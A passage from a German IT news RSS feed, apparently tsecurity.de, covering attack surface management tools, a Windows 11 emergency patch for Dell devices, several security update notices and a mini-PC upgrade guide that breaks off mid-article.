<p class="wp-block-paragraph">Assets überwacht die Lösung kontinuierlich, wobei identifizierte Risiken in Echtzeit priorisiert werden. Darüber hinaus stehen auch Zusatz-Services wie manuelle Risikoprüfungen oder Penetrationstests zur Verfügung. Das Workflow-basierte Response-System der Lösung verspricht eine einfachere Einbindung mehrerer Teams, indem existierende Ticketing- und Kommunikations-Tools integriert werden. Praktisch ist auch die Möglichkeit, Konfigurationsänderungen oder System Updates zu validieren, um sicherzustellen, dass identifizierte Bedrohungen tatsächlich bereinigt wurden.  </p>



<p class="wp-block-paragraph"><a href="https://www.crowdstrike.com/products/security-and-it-operations/falcon-surface/" target="_blank" rel="noreferrer noopener"><strong>CrowdStrike Falcon Exposure Management</strong></a></p>



<p class="wp-block-paragraph">Crowdstrike hat sein Falcon-Surface-Angebot von einem Standalone EASM-Tool zu einem Kernbestandteil von Falcon Exposure Management ausgebaut. Die Lösung wird nun auch durch KI-nativen Code dabei unterstützt, Risiken zu identifizieren und auszuschalten. Darüber hinaus kommt die Technologie auch für Adversarial-AI-Szenarien zum Einsatz.</p>



<p class="wp-block-paragraph">Die Crowdstrike-Lösung kann außerdem:</p>



<ul class="wp-block-list">
<li>Risiken mit dem Business-Kontext korrelieren,</li>



<li>die Ausnutzbarkeit validieren und</li>



<li>direkte Abhilfemaßnahmen über die Falcon-Plattform einleiten.</li>
</ul>



<p class="wp-block-paragraph">Unternehmen sollen sich mit dem Tool einen nachhaltigen Überblick über ihre Angriffsfläche verschaffen und Risiken oder Bedrohungen mit einer Vielzahl von Techniken aufspüren können. Dazu gehören etwa aktive, passive und API-basierte Scans, um mit dem Internet verbundene Ressourcen zu identifizieren.</p>



<p class="wp-block-paragraph">Falcon Exposure Management ist nicht Teil des Enterprise-Softwarepakets von Crowdstrike. Es kann als Abonnementlizenz auf Basis der gemanagten Endpunkte erworben werden.</p>



<p class="wp-block-paragraph"><a href="https://www.cycognito.com/attack-surface-management" target="_blank" rel="noreferrer noopener"><strong>CyCognito Attack Surface Management</strong></a></p>



<p class="wp-block-paragraph">Das CAASM-Produkt von CyCognito bietet eine kontinuierliche Überwachung und Inventarisierung von Assets. Dabei spielt es keine Rolle, ob diese On-Premises, in der Cloud, bei einem Drittanbieter oder einer Tochtergesellschaft vorliegen.</p>



<p class="wp-block-paragraph">Um den Triage-Prozess und die Risiko-Priorisierung zu erleichtern, kann auch Business-Kontext hinzugefügt werden (beispielsweise Beziehungen zwischen einzelnen Assets). Das hilft dabei, sich auf die wichtigsten Netzwerkrisiken zu konzentrieren. CyCognitos Tool verfolgt darüber hinaus auch Konfigurationsänderungen und ermöglicht so, neue Risiken für die Unternehmensinfrastruktur schnell zu identifizieren.</p>



<p class="wp-block-paragraph"><a href="https://www.jupiterone.com/cyber-asset-attack-surface-management" target="_blank" rel="noreferrer noopener"><strong>JupiterOne Cyber Asset Attack Surface Management</strong></a></p>



<p class="wp-block-paragraph">JupiterOne preist seine CAASM-Lösung als eine Möglichkeit an, “Cyber-Asset-Daten nahtlos in einer einheitlichen Ansicht zu aggregieren”. Der Kontext wird bei Bedarf automatisch hinzugefügt, und die Beziehungen zwischen den Assets können definiert und optimiert werden, um <a href="https://www.csoonline.com/article/3495294/schwachstellen-managen-die-6-besten-vulnerability-management-tools.html" target="_blank">Schwachstellenanalyse</a> und Incident-Response-Fähigkeiten zu verbessern.</p>



<p class="wp-block-paragraph">Benutzerdefinierte Abfragen ermöglichen es Cybersecurity-Teams, komplexe Fragen zu beantworten, während der Asset-Bestand über eine interaktive Map durchsucht werden kann. Die Security-Tools, in die Sie bereits investiert haben, können Sie integrieren – was eine ganzheitliche, zentralisierte Perspektive auf das Security-Niveau zulässt.</p>



<p class="wp-block-paragraph"><a href="https://azure.microsoft.com/de-de/products/defender-external-attack-surface-management/" target="_blank" rel="noreferrer noopener"><strong>Microsoft Defender External Attack Surface Management</strong></a></p>



<p class="wp-block-paragraph">Microsoft Defender EASM erkennt nicht verwaltete Assets und Ressourcen, die per Schatten-IT bereitgestellt werden oder sich auf anderen Cloud-Plattformen befinden. Sobald die Assets und Ressourcen identifiziert sind, sucht das Tool nach Schwachstellen auf jeder Ebene des Technologie-Stacks, einschließlich der zugrunde liegenden Plattform, App-Frameworks, Webanwendungen, Komponenten und des Kerncodes.</p>



<p class="wp-block-paragraph">Defender EASM ermöglicht es IT-Profis, Schwachstellen in neu entdeckten Ressourcen schnell zu beheben, indem diese nach Entdeckung in Echtzeit kategorisiert und priorisiert werden. Naturgemäß lässt sich Defender EASM eng mit anderen Microsoft-Lösungen wie Security Copilot integrieren.</p>



<p class="wp-block-paragraph"><a href="https://outpost24.com/products/external-attack-surface-management/" target="_blank" rel="noreferrer noopener"><strong>Outpost24 EASM</strong></a></p>



<p class="wp-block-paragraph">Der schwedische Anbieter Outpost24 hat 2023 den belgischen EASM-Anbieter Sweepatic übernommen und dessen Tool in seine Modul-Kollektion für Threat Intelligence, Data Leakage und Pentesting integriert. Diese EASM-Lösung ist sowohl Standalone, als auch als Managed Service erhältlich und kann Daten entweder passiv über DNS und andere TCP/IP-Details oder über direkte Verbindungen zu Cloud-Anbietern wie AWS und Azure sowie den Lösungen großer Softwareanbieter (etwa ServiceNow, Slack oder Atlassian) erfassen.</p>



<p class="wp-block-paragraph"><a href="https://www.paloaltonetworks.com/cortex/cortex-xpanse" target="_blank" rel="noreferrer noopener"><strong>Palo Alto Networks Cortex Xpanse</strong></a></p>



<p class="wp-block-paragraph">Xpanse ist Teil der XSIAM-Produktsuite von Palo Alto, kann jedoch auch separat erworben werden. Das Standalone-Produkt hat allerdings einen etwas geringeren Funktionsumfang.</p>



<p class="wp-block-paragraph">Das Palo-Alto-Tool unterstützt auch die Integration mit Tools von Drittanbietern wie Qualys, Jira und ServiceNow. Zudem verfügt das Produkt über eine beeindruckende Auswahl an vorgefertigten Detection-Regeln, Widgets, um Queries und Discovery-Routinen zu erstellen und anpassbare Daten-Dashboards aufzusetzen.</p>



<p class="wp-block-paragraph"><a href="https://www.rapid7.com/de/products/command/attack-surface-management-asm/" target="_blank" rel="noreferrer noopener"><strong>Rapid7 Surface Command</strong></a></p>



<p class="wp-block-paragraph">Surface Command ist nur eines von zahlreichen Modulen, das Rapid7 im Angebot hat (unter anderem Vulnerability und Incident Management sowie Cloud-Native Security). Das Tool bringt Threat Exposure, Detection und Response unter einen Nenner und verspricht eine kontinuierliche „Vogelperspektive“ über sämtliche Schwachstellen – vom Endpunkt bis hin zur Cloud.</p>



<p class="wp-block-paragraph">Das Rapid-7-Tool ist darauf konzipiert, blinde Flecken in der Security aufzuspüren sowie Reaktion und Behebung zu beschleunigen. Für letzteres sind zudem auch agentenbasierte KI-Funktionen enthalten.</p>



<p class="wp-block-paragraph"><a href="https://riskprofiler.io/" target="_blank" rel="noreferrer noopener"><strong>RiskProfiler EASM</strong></a></p>



<p class="wp-block-paragraph">Über die RiskProfiler-Plattform lassen sich sämtliche externen Bedrohungen managen. Das Tool ermöglicht beispielsweise <a href="https://www.computerwoche.de/article/3495708/bedrohungs-monitoring-die-10-besten-tools-zur-darknet-uberwachung.html" target="_blank">Dark-Web-Monitoring</a>, digitales Monitoring sowie Hacking-Kampagnen, Schwachstellen und Supply-Chain-Angriffe zu tracken. Die hieraus gewonnenen Bedrohungsinformationen werden von KI-Agenten zu einem einheitlichen Korpus verdichtet.</p>



<p class="wp-block-paragraph">Bestandteil des Tools sind zudem mehr als 13.000 vorinstallierte Regeln, die sowohl Open-Source- als auch eigene proprietäre Algorithmen miteinander verbinden. Auch die Risikobewertungen von Drittanbietern werden analysiert. Ein anpassbares Management-Dashboard visualisiert die Daten in diversen Ansichten. </p>



<p class="wp-block-paragraph"><a href="https://socradar.io/suites/attack-surface-management/" target="_blank" rel="noreferrer noopener"><strong>SOCRadar AttackMapper</strong></a></p>



<p class="wp-block-paragraph">Mit AttackMapper (ein Teil der Tool-Suite für SOC-Teams), will SOCRadar, den Anwendern die Sicht der Angreifer auf die Assets ermöglichen. Das Tool überwacht Assets mithilfe von Agentic AI dynamisch in Echtzeit, identifiziert neue oder veränderte und analysiert sie auf potenzielle Schwachstellen.</p>



<p class="wp-block-paragraph">Die Ergebnisse werden mit bekannten Angriffsmethoden korreliert, um den Entscheidungsfindungs- und Triageprozess zu unterstützen. Dabei überwacht AttackMapper nicht nur Endpunkte und Software Vulnerabilities, sondern auch SSL-Schwachstellen, abgelaufene Zertifikate, DNS-Einträge und Konfigurationen. Das Tool erkennt selbst Website-Defacement-Angriffe, was entscheidend sein kann, um die Markenreputation zu schützen.</p>



<p class="wp-block-paragraph"><a href="https://de.tenable.com/products/attack-surface-management" target="_blank" rel="noreferrer noopener"><strong>Tenable Attack Surface Management</strong></a></p>



<p class="wp-block-paragraph">Tenable hat schon seit einigen Jahren Tools im Angebot, um Schwachstellen aufzuspüren – und auch die aktuelle Tool-Suite wird modernen IT-Sicherheitsanforderungen gerecht. Bei Tenable Attack Surface Management handelt es sich um das EASM-Modul des Unternehmens, das in dessen Exposure-Management-Plattform „One“ integriert ist.</p>



<p class="wp-block-paragraph">Tenable Attack Surface Management liefert Kontext und Details zu Assets und Schwachstellen, allerdings nicht nur aus technischer Sicht, sondern auch auf Business-Ebene, was für eine umfassende Priorisierung der Maßnahmen erforderlich ist.</p>



<h2 class="wp-block-heading">7 Fragen vor dem ASM-Invest</h2>



<p class="wp-block-paragraph">Die folgenden Fragen sollten Sie sich und potenziellen Anbietern von Attack-Surface-Management-Lösungen stellen, bevor Sie einen Vertrag unterzeichnen.</p>



<ul class="wp-block-list">
<li><strong>Benötigt unser Unternehmen eine EASM- oder eine CAASM-Lösung?</strong> Die Antwort darauf hängt davon ab, ob Sie nach internen oder externen Angreifern suchen – und wie groß der Anteil Ihrer lokalen Infrastruktur ist.</li>



<li><strong>Wie umfangreich – und effektiv – ist das Tool automatisiert?</strong> Erkennt es zuverlässig alle anfälligen Ressoucren, einschließlich digitaler Zertifikate, offengelegter Anmeldedaten und mit dem Netz verbundene Server und Services? Welche Metadaten und weiteren Details liefert die Lösung?  </li>



<li><strong>Wie behebt die Lösung Schwachstellen, wenn sie welche findet?</strong> Läuft das automatisiert ab oder sind manuelle Eingriffe erforderlich?</li>



<li><strong>Unterstützt das Tool Continuous Monitoring?</strong> Und falls ja: Wie werden Veränderungen nachgehalten?</li>



<li><strong>Welche Schwachstellen werden wie mit anderen SOC-Tools geteilt oder integriert?</strong></li>



<li><strong>Gibt es unterschiedliche Dashboards für Management- und andere Zwecke?</strong> Beziehungsweise: Wie lässt sich das Tool auf unterschiedliche Benutzergruppen anpassen?</li>



<li><strong>Wie sieht ihre Preisgestaltung im Detail aus?</strong> Stellen Sie sicher, dass Sie das Preisgefüge des Anbieters Ihrer Wahl wirklich verstehen. In den meisten Fällen sind Sie dabei mit komplexen, nutzungsabhängigen Abrechnungsmodellen konfrontiert.</li>
</ul>



<p class="wp-block-paragraph">(fm)</p>



<p class="wp-block-paragraph"><strong>Dieser Beitrag ist <a href="https://www.csoonline.com/article/574797/9-attack-surface-discovery-and-management-tools.html" target="_blank">im Original</a> bei unserer Schwesterpublikation CSOonline.com erschienen.</strong></p>
</div></div></div></div>]]></content:encoded>
</item>
<item>
<title><![CDATA[Wenn ihr Google Chrome am Desktop nutzt, solltet ihr jetzt aktiv werden]]></title>
<description><![CDATA[Neues Update für Google Chrome behebt kritische Sicherheitslücken. So bekommt ihr es.]]></description>
<link>https://tsecurity.de/de/3681585/it-nachrichten/wenn-ihr-google-chrome-am-desktop-nutzt-solltet-ihr-jetzt-aktiv-werden/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3681585/it-nachrichten/wenn-ihr-google-chrome-am-desktop-nutzt-solltet-ihr-jetzt-aktiv-werden/</guid>
<pubDate>Mon, 20 Jul 2026 18:03:12 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Neues Update für Google Chrome behebt kritische Sicherheitslücken. So bekommt ihr es.]]></content:encoded>
</item>
<item>
<title><![CDATA[Microsoft verteilt Notfall-Update für Windows 11 – diese Nutzer sollten es jetzt installieren]]></title>
<description><![CDATA[Microsoft hat am Wochenende ein außerplanmäßiges Update für Windows 11 veröffentlicht. Das Update mit der Kennung KB5121767 richtet sich an Nutzer von Windows 11 24H2 und 25H2 und soll ein Problem beheben, das nach den jüngsten Windows-Updates bei einer begrenzten Anzahl von Geräten aufgetreten i...]]></description>
<link>https://tsecurity.de/de/3680558/it-nachrichten/microsoft-verteilt-notfall-update-fuer-windows-11-diese-nutzer-sollten-es-jetzt-installieren/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3680558/it-nachrichten/microsoft-verteilt-notfall-update-fuer-windows-11-diese-nutzer-sollten-es-jetzt-installieren/</guid>
<pubDate>Mon, 20 Jul 2026 10:18:18 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div>
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>



<p>Microsoft hat am Wochenende ein außerplanmäßiges Update für Windows 11 veröffentlicht. Das Update mit der Kennung KB5121767 richtet sich an Nutzer von Windows 11 24H2 und 25H2 und soll ein Problem beheben, das nach den jüngsten Windows-Updates bei einer begrenzten Anzahl von Geräten aufgetreten ist.</p>



<p>Darauf macht Microsoft in den offiziellen Versionshinweisen aufmerksam. Betroffen sind vor allem bestimmte Dell-PCs und Notebooks mit einem Intel-Treiber für das sogenannte Intel Innovation Platform Framework (Intel IPF).</p>



<h2 class="wp-block-heading">Was das Update behebt</h2>



<p><a href="https://support.microsoft.com/en-us/servicing/os/windows-11/2026/07/kb5121767-out-of-band" target="_blank" rel="noreferrer noopener">Laut Microsoft</a> konnte es nach der Installation aktueller Windows-Updates auf einigen Geräten zu Veränderungen der Systemleistung, erhöhtem Stromverbrauch oder unerwartetem Systemverhalten kommen. Ursache ist ein Konflikt mit dem Intel-IPF-Treiber.</p>



<p>Der Treiber ist unter anderem für Funktionen rund um Energieverwaltung, Temperatursteuerung und Leistungsoptimierung zuständig. Wenn dieser nicht korrekt mit Windows zusammenarbeitet, können sich Probleme bei Akkulaufzeit, Performance oder Stabilität bemerkbar machen.</p>



<p>Microsoft hatte deshalb die Verteilung des <a href="https://support.microsoft.com/en-us/servicing/os/windows-11/2026/07/july-14-2026-kb5101650-os-builds-26200-8875-and-26100-8875" target="_blank" rel="noreferrer noopener">Juli-Sicherheitsupdates KB5101650</a> für betroffene Systeme vorübergehend blockiert. Mit dem nun veröffentlichten Update KB5121767 wird diese Sperre wieder aufgehoben.</p>



<h2 class="wp-block-heading">Welche Geräte betroffen sind</h2>



<p>Microsoft spricht von einer begrenzten Zahl betroffener Systeme. In Berichten werden vor allem neuere Dell-Modelle genannt, darunter verschiedene Precision-, XPS- und Pro-Max-Geräte.</p>



<p>Für die große Mehrheit aller Windows-11-Nutzer besteht laut Microsoft kein Handlungsbedarf. Das Unternehmen empfiehlt die Installation des Updates ausdrücklich nur auf Geräten, die tatsächlich von dem Fehler betroffen sind.</p>



<h2 class="wp-block-heading">So erhalten Sie das Update</h2>



<p>Wer in Windows Update die Option <strong>„Erhalten Sie die neuesten Updates, sobald sie verfügbar sind“</strong> aktiviert hat, erhält KB5121767 automatisch.</p>



<p>Alternativ lässt sich das Update über <strong>Einstellungen &gt; Windows Update</strong> manuell herunterladen und installieren. Außerdem stellt Microsoft das Paket über den Microsoft Update Catalog bereit.</p>



<p>Nach der Installation steigt die Build-Nummer auf:</p>



<ul class="wp-block-list">
<li>Windows 11 25H2: Build 26200.8894</li>



<li>Windows 11 24H2: Build 26100.8894</li>
</ul>



<p>Da es sich um ein kumulatives Update handelt, enthält KB5121767 auch alle bisherigen Sicherheits- und Qualitätsverbesserungen der vorherigen Updates.</p>



<p>Zusätzlich aktualisiert Microsoft mehrere KI-Komponenten von Windows auf Version 1.2605.856.0. Dazu gehören unter anderem Funktionen für Bildsuche, Inhaltserkennung und semantische Analyse.</p>



<h2 class="wp-block-heading">Für wen das Update wichtig ist</h2>



<p>Wenn Ihr Windows-11-PC nach den Juli-Updates ungewöhnlich langsam geworden ist, mehr Strom verbraucht als üblich oder sich auffällig verhält, kann sich die Installation von KB5121767 lohnen. Das gilt insbesondere für Besitzer aktueller Dell-Geräte mit Intel-Prozessoren.</p>



<p>Läuft Ihr Rechner dagegen problemlos, müssen Sie laut Microsoft nichts unternehmen.</p>



<p><em>Übrigens: Sollten Sie Windows 11 Home im Einsatz haben, dann entgehen Ihnen die vielen Vorteile der Pro-Version, die wir Ihnen <a href="https://www.pcwelt.de/article/1203134/windows-11-unterschiede-zwischen-home-und-pro-version.html" target="_blank" rel="noreferrer noopener">hier vorstellen.</a> Im PC-WELT Software-Shop ist das Windows-11-Upgrade <a href="https://software.pcwelt.de/offer/windows_11_professional_upgrade/44487?x-source=rss" target="_blank" rel="noreferrer noopener">für günstige 59,99 Euro statt 145 Euro</a> erhältlich.</em></p>

</div>]]></content:encoded>
</item>
<item>
<title><![CDATA[Product showcase: ZoneAlarm Mobile Security adds customizable content filtering to mobile security]]></title>
<description><![CDATA[ZoneAlarm Mobile Security is a security app from Check Point designed to protect mobile devices against phishing, malicious websites, unsafe networks, and fraudulent links. It is available for iPhone, iPad, Android, and can run on Apple silicon Macs through the App Store. Getting started The onbo...]]></description>
<link>https://tsecurity.de/de/3680293/it-security-nachrichten/product-showcase-zonealarm-mobile-security-adds-customizable-content-filtering-to-mobile-security/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3680293/it-security-nachrichten/product-showcase-zonealarm-mobile-security-adds-customizable-content-filtering-to-mobile-security/</guid>
<pubDate>Mon, 20 Jul 2026 07:54:09 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>ZoneAlarm Mobile Security is a security app from Check Point designed to protect mobile devices against phishing, malicious websites, unsafe networks, and fraudulent links. It is available for iPhone, iPad, Android, and can run on Apple silicon Macs through the App Store. Getting started The onboarding process begins with a request for notification permissions, followed by instructions for enabling the Safari extension. Once enabled, the extension checks websites before they load to help protect browsing … <a href="https://www.helpnetsecurity.com/2026/07/20/product-showcase-zonealarm-mobile-security-adds-customizable-content-filtering-to-mobile-security/" rel="nofollow">More <span class="meta-nav">→</span></a></p>
<p>The post <a href="https://www.helpnetsecurity.com/2026/07/20/product-showcase-zonealarm-mobile-security-adds-customizable-content-filtering-to-mobile-security/">Product showcase: ZoneAlarm Mobile Security adds customizable content filtering to mobile security</a> appeared first on <a href="https://www.helpnetsecurity.com/">Help Net Security</a>.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Cybersicherheit: Microsoft behebt 570 Schwachstellen im Juli-Patch - ad-hoc-news.de]]></title>
<description><![CDATA[Cybersicherheit: Microsoft behebt 570 Schwachstellen im Juli-Patch ... IT-Sicherheit ohne teure Investitionen nachhaltig stärken. Kostenloses ...]]></description>
<link>https://tsecurity.de/de/3679260/it-security-nachrichten/cybersicherheit-microsoft-behebt-570-schwachstellen-im-juli-patch-ad-hoc-newsde/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3679260/it-security-nachrichten/cybersicherheit-microsoft-behebt-570-schwachstellen-im-juli-patch-ad-hoc-newsde/</guid>
<pubDate>Sun, 19 Jul 2026 11:53:11 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Cybersicherheit: Microsoft behebt 570 Schwachstellen im Juli-Patch ... <b>IT</b>-<b>Sicherheit</b> ohne teure Investitionen nachhaltig stärken. Kostenloses ...]]></content:encoded>
</item>
<item>
<title><![CDATA[Philips Hue Bridge Pro: Update behebt kritischen Fehler – so schützen Sie sich]]></title>
<description><![CDATA[Philips hat ein wichtiges Update für die Hue Bridge Pro veröffentlicht. Es behebt einen Fehler, der die Smart-Home-Zentrale komplett lahmlegen konnte. Nutzer sollten das Update zeitnah installieren.]]></description>
<link>https://tsecurity.de/de/3679227/it-nachrichten/philips-hue-bridge-pro-update-behebt-kritischen-fehler-so-schuetzen-sie-sich/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3679227/it-nachrichten/philips-hue-bridge-pro-update-behebt-kritischen-fehler-so-schuetzen-sie-sich/</guid>
<pubDate>Sun, 19 Jul 2026 11:17:29 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Philips hat ein wichtiges Update für die Hue Bridge Pro veröffentlicht. Es behebt einen Fehler, der die Smart-Home-Zentrale komplett lahmlegen konnte. Nutzer sollten das Update zeitnah installieren.]]></content:encoded>
</item>
<item>
<title><![CDATA[Windows 11: Microsoft startet Notfall-Patch KB5121767 gegen Abstürze]]></title>
<description><![CDATA[Das Juli-Patchday-Update sorgte kürzlich auf bestimmten Dell-Computern für Abstürze, Überhitzung und leere Akkus. Nun steht ein Notfall-Fix bereit, der die ernsten Probleme behebt. Wer kein betroffenes Gerät besitzt, benötigt das Update nicht.			(Weiter lesen)]]></description>
<link>https://tsecurity.de/de/3679069/it-security-nachrichten/windows-11-microsoft-startet-notfall-patch-kb5121767-gegen-abstuerze/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3679069/it-security-nachrichten/windows-11-microsoft-startet-notfall-patch-kb5121767-gegen-abstuerze/</guid>
<pubDate>Sun, 19 Jul 2026 09:37:49 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<a href="https://winfuture.de/news,160074.html"><img hspace="5" border="0" align="left" alt="Fehler, Bug, Bugfix, Error, Bugs bugs bugs, Windows 11 Fehler, Windows 11 Bugs Bugs Bugs, Windows 11 Troubleshoot, Windows 11 Bug" width="1920" height="1080" src="https://i.wfcdn.de/teaser/1920/52399.jpg"></a>
			Das Juli-Patchday-Update sorgte kürzlich auf bestimmten Dell-Computern für Abstürze, Überhitzung und leere Akkus. Nun steht ein Notfall-Fix bereit, der die ernsten Probleme behebt. Wer kein betroffenes Gerät besitzt, benötigt das Update nicht.			(<a href="https://winfuture.de/news,160074.html">Weiter lesen</a>)]]></content:encoded>
</item>
<item>
<title><![CDATA[Mini-PC aufrüsten: Was möglich ist und was sich lohnt]]></title>
<description><![CDATA[Mini-PCs sind längst mehr als einfache Office-Rechner. Sie stehen auf dem Schreibtisch, hinter dem Monitor, im Wohnzimmer oder im Heimlabor und übernehmen dort Aufgaben, für die früher ein großer Desktop-PC nötig war. Genau deshalb lohnt sich der Blick ins Innere: Wer RAM, SSD, WLAN und Anschlüss...]]></description>
<link>https://tsecurity.de/de/3679030/windows-tipps/mini-pc-aufruesten-was-moeglich-ist-und-was-sich-lohnt/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3679030/windows-tipps/mini-pc-aufruesten-was-moeglich-ist-und-was-sich-lohnt/</guid>
<pubDate>Sun, 19 Jul 2026 09:10:02 +0200</pubDate>
<category>🪟 Windows Tipps</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div>
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>



<p>Mini-PCs sind längst mehr als einfache Office-Rechner. Sie stehen auf dem Schreibtisch, hinter dem Monitor, im Wohnzimmer oder im Heimlabor und übernehmen dort Aufgaben, für die früher ein großer Desktop-PC nötig war. Genau deshalb lohnt sich der Blick ins Innere: Wer RAM, SSD, WLAN und Anschlüsse vor dem Kauf richtig einschätzt, kann ein kompaktes System später gezielt erweitern statt vorschnell ersetzen.</p>



<p>Der Spielraum ist allerdings kleiner als bei klassischen Tower-PCs. Kompakte Gehäuse, verlötete Bauteile und enge Kühlsysteme setzen klare Grenzen. Trotzdem können RAM, SSD, WLAN-Modul oder externe Grafiklösung den Unterschied machen – zwischen einem Mini-PC, der nur knapp ausreicht, und einem System, das noch mehrere Jahre sinnvoll nutzbar bleibt.</p>



<h2 class="wp-block-heading">Was sich überhaupt aufrüsten lässt</h2>



<p>Drei Komponenten sind in den meisten Mini-PCs zugänglich: Arbeitsspeicher, SSD und das WLAN-Modul. Eine externe Grafikkarte kommt als vierte Option hinzu, sofern der passende Anschluss vorhanden ist. Prozessor und integrierte Grafik bleiben außen vor. Sie sind fest verlötet. Wer das vorher weiß, spart sich Enttäuschungen.</p>



<p>Wie groß die Unterschiede ausfallen können, zeigt der <a href="https://www.pcwelt.de/article/2966291/sapphire-edge-ai-370-test.html" target="_blank" rel="noreferrer noopener">Sapphire Edge AI 370</a> als positives Beispiel. Der Mini-PC nutzt austauschbare DDR5-SO-DIMMs statt verlötetem LPDDR-Speicher und unterstützt bis zu 96 GB RAM. Auch die SSDs sind gut erreichbar: Der magnetisch befestigte Deckel lässt sich ohne Werkzeug abnehmen, darunter liegen die wichtigsten Komponenten direkt zugänglich. Für Käufer, die später aufrüsten wollen, ist eine solche Bauweise ein klarer Vorteil.</p>



<h2 class="wp-block-heading">Arbeitsspeicher: der erste Griff</h2>



<p>Der RAM ist die naheliegendste Maßnahme. In vielen Mini-PCs stecken SO-DIMM-Riegel in einem Sockel, wie man sie aus dem Notebook kennt. Oft reichen ein Schraubendreher und wenige Minuten. Je nach Gehäuse können aber zusätzliche Abdeckungen, Clips oder verklebte Füße den Zugriff erschweren.</p>



<p>Aktuelle Geräte nutzen DDR5, ältere DDR4. Die beiden Generationen sind nicht kompatibel, die Kerbe sitzt an anderer Stelle.</p>


<div class="extendedBlock-wrapper block-coreImage undefined"><figure data-wp-context='{"imageId":"6a5c7833cb865"}' data-wp-interactive="core/image" class="wp-block-image size-large wp-lightbox-container"><img decoding="async" data-wp-class--hide="state.isContentHidden" data-wp-class--show="state.isContentVisible" data-wp-init="callbacks.setButtonStyles" data-wp-on-async--click="actions.showLightbox" data-wp-on-async--load="callbacks.setButtonStyles" data-wp-on-async-window--resize="callbacks.setButtonStyles" src="https://b2c-contenthub.com/wp-content/uploads/2025/11/Test-SAPPHIRE-EDGE-AI-370-Aufrustung.jpg?quality=50&amp;strip=all&amp;w=1200" alt="Test SAPPHIRE EDGE AI 370 - Aufrüstung" class="wp-image-2966297" width="1200" height="900" loading="lazy"><button class="lightbox-trigger" type="button" aria-haspopup="dialog" aria-label="Enlarge" data-wp-init="callbacks.initTriggerButton" data-wp-on-async--click="actions.showLightbox" data-wp-style--right="state.imageButtonRight" data-wp-style--top="state.imageButtonTop">
				<svg xmlns="http://www.w3.org/2000/svg" width="12" height="12" fill="none" viewbox="0 0 12 12">
					<path fill="#fff" d="M2 0a2 2 0 0 0-2 2v2h1.5V2a.5.5 0 0 1 .5-.5h2V0H2Zm2 10.5H2a.5.5 0 0 1-.5-.5V8H0v2a2 2 0 0 0 2 2h2v-1.5ZM8 12v-1.5h2a.5.5 0 0 0 .5-.5V8H12v2a2 2 0 0 1-2 2H8Zm2-12a2 2 0 0 1 2 2v2h-1.5V2a.5.5 0 0 0-.5-.5H8V0h2Z"></path>
				</svg>
			</button></figure><p class="imageCredit">Christoph Hoffmann</p></div>



<p>Zwei Punkte entscheiden über den Erfolg: Erstens die maximale Kapazität, die das Board adressiert. Steht im Datenblatt 64 GB, sollte man ein größeres Kit nicht einplanen. In Einzelfällen kann mehr Speicher funktionieren, garantiert ist das aber nicht. Zweitens der Dual-Channel-Betrieb. Zwei gleiche Riegel liefern mehr Tempo als ein einzelner, was sich gerade bei der integrierten Grafik bemerkbar macht.</p>



<p>Vorsicht bei besonders flachen Modellen: LPDDR5 oder LPDDR5X sitzt meist fest auf der Platine, ein Tausch ist ausgeschlossen. LPCAMM2 könnte das künftig ändern, weil LPDDR-Speicher damit als steckbares Modul ausgeführt wird. In Mini-PCs ist das aber noch nicht der Normalfall. Wer später aufrüsten will, sollte deshalb vor dem Kauf ausdrücklich nach SO-DIMM- oder LPCAMM2-Steckplätzen suchen.</p>



<h2 class="wp-block-heading">SSD: mehr Platz, mehr Tempo</h2>



<p>Die zweite lohnende Maßnahme betrifft die SSD. Hersteller sparen hier gern an zwei Fronten: an Kapazität und an Tempo. 512 GB sind schnell voll. Viele Mini-PCs bieten einen M.2-2280-Steckplatz für eine NVMe-SSD, manche zwei oder drei. Geräte wie der GMKtec K12 bringen drei M.2-Slots mit – Raum genug, um Windows und Daten zu trennen.</p>


<div class="extendedBlock-wrapper block-coreImage undefined"><figure data-wp-context='{"imageId":"6a5c7833cbe9f"}' data-wp-interactive="core/image" class="wp-block-image size-large wp-lightbox-container"><img decoding="async" data-wp-class--hide="state.isContentHidden" data-wp-class--show="state.isContentVisible" data-wp-init="callbacks.setButtonStyles" data-wp-on-async--click="actions.showLightbox" data-wp-on-async--load="callbacks.setButtonStyles" data-wp-on-async-window--resize="callbacks.setButtonStyles" src="https://b2c-contenthub.com/wp-content/uploads/2025/08/Geekom-A9-Max-SSD.jpg?quality=50&amp;strip=all&amp;w=1200" alt="Geekom A9 Max - SSD" class="wp-image-2883325" width="1200" height="900" loading="lazy"><button class="lightbox-trigger" type="button" aria-haspopup="dialog" aria-label="Enlarge" data-wp-init="callbacks.initTriggerButton" data-wp-on-async--click="actions.showLightbox" data-wp-style--right="state.imageButtonRight" data-wp-style--top="state.imageButtonTop">
				<svg xmlns="http://www.w3.org/2000/svg" width="12" height="12" fill="none" viewbox="0 0 12 12">
